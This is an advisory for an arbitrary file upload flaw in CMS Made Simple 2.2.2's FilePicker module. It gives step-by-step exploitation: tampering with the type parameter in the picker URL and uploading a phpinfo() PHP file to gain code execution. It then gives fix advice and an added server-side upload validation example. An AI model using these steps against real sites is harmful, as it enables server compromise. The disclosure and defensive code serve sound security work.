FilePicker arbitrary file upload vulnerability in CMS Made Simple (CMSMS) 2.2.2

Released: 07.08.2017
CMS Made Simple (CMSMS) 2.2.2 allows a remote authenticated administrator to upload PHP files through the FilePicker module by changing the picker's client-supplied type parameter. The uploaded script is served from the web-accessible uploads directory, so the attacker gains arbitrary code execution as the web server user.

Step 1

Log in with an administrator account at:
http://localhost/admin/login.php

Step 2

Open the Content Manager and edit a page:
http://localhost/admin/moduleinterface.php?mact=CMSContentManager,m1,admineditcontent,0&sk=663b23d5153f19ab551&m1contentid=1

In the editor, click insert/edit image. This opens the FilePicker module in an iframe:
http://localhost/admin/moduleinterface.php?mact=FilePicker,m1,filepicker,0&sk=663b23d5153f19ab551&showtemplate=false&field=&inst=i15d516d828d&type=image

The type parameter in this URL decides which kinds of files the picker accepts, and it is fully controlled by the client. Change type=image to type=file (the sk and inst values are session-specific and will differ in your session):
http://localhost/admin/moduleinterface.php?mact=FilePicker,m1,filepicker,0&sk=663b23d5153f19ab551&showtemplate=false&field=&inst=i15d516d828d&type=file

The picker now accepts a PHP script. Upload help.php with the following content:

<?php
    // Proof of execution only: prints the PHP configuration of the server.
    phpinfo();
?>

Step 3

Request the uploaded file. If the phpinfo() output is returned, the server is executing attacker-supplied PHP:
http://localhost/uploads/help.php

Fix

1. Filter the uploaded file format on the server side: validate the file extension against a whitelist that does not depend on the client-supplied type parameter, and reject PHP and other server-executable extensions in every position of the file name.
2. As defence in depth, serve the uploads directory with PHP execution disabled, so a file that slips past the filter still cannot run.
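The check below is an added example written for this writeup; it is not code from CMS Made Simple and does not show how the project fixed the bug. It demonstrates the first fix item: the upload handler keeps its own type-to-extension whitelist, treats the client-supplied type only as a key into that whitelist, and refuses executable extensions anywhere in the name. The profile map, the executable-extension list and the store_upload handler are assumptions for illustration.

```php
<?php
// Added example, not CMS Made Simple code: server-side upload validation
// that does not trust the client-supplied "type" value. The extension
// lists and the handler below are illustrative assumptions.

// Whitelist per picker type. The client chooses the type, so every entry
// must be safe; an unknown type falls back to the most restrictive list.
function allowed_extensions(string $type): array
{
    $profiles = [
        'image' => ['jpg', 'jpeg', 'png', 'gif'],
        'file'  => ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip'],
    ];
    return $profiles[$type] ?? $profiles['image'];
}

// Extensions the web server may execute. They are rejected in any
// position of the name, so "help.php.jpg" is refused as well (Apache
// configured with AddHandler can still run such a file as PHP).
const EXECUTABLE_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'phps',
    'cgi', 'pl', 'py', 'sh', 'htaccess',
];

function is_upload_name_safe(string $filename, string $type): bool
{
    // No directory components, no empty names, no hidden files.
    $base = basename($filename);
    if ($base === '' || $base !== $filename || $base[0] === '.') {
        return false;
    }
    $parts = explode('.', strtolower($base));
    if (count($parts) < 2) {
        return false;                       // no extension at all
    }
    foreach (array_slice($parts, 1) as $segment) {
        if (in_array($segment, EXECUTABLE_EXTENSIONS, true)) {
            return false;                   // executable extension anywhere
        }
    }
    // The final extension must be in the whitelist for this type.
    return in_array(end($parts), allowed_extensions($type), true);
}

// Hypothetical handler: validates the $_FILES entry, then stores the
// file with non-executable permissions.
function store_upload(array $file, string $type, string $uploadDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_upload_name_safe($file['name'], $type)) {
        return null;
    }
    $dest = rtrim($uploadDir, '/') . '/' . basename($file['name']);
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $dest;
}

// Stand-alone demonstration with constructed file names.
if (PHP_SAPI === 'cli') {
    $samples = [
        ['help.php', 'file'], ['help.php.jpg', 'file'], ['help.phtml', 'image'],
        ['photo.jpg', 'image'], ['../photo.jpg', 'image'], ['notes.pdf', 'file'],
    ];
    foreach ($samples as [$name, $type]) {
        printf("%-14s type=%-5s -> %s\n", $name, $type,
               is_upload_name_safe($name, $type) ? 'accept' : 'reject');
    }
}
```

Run it from the command line (php example.php) to see which of the constructed names are accepted. For the second fix item, pair the check with web server configuration that disables script execution under uploads/, for example `php_admin_flag engine off` in an Apache directory block when PHP runs as a module, so that a name the filter does not anticipate is served as a plain file rather than executed.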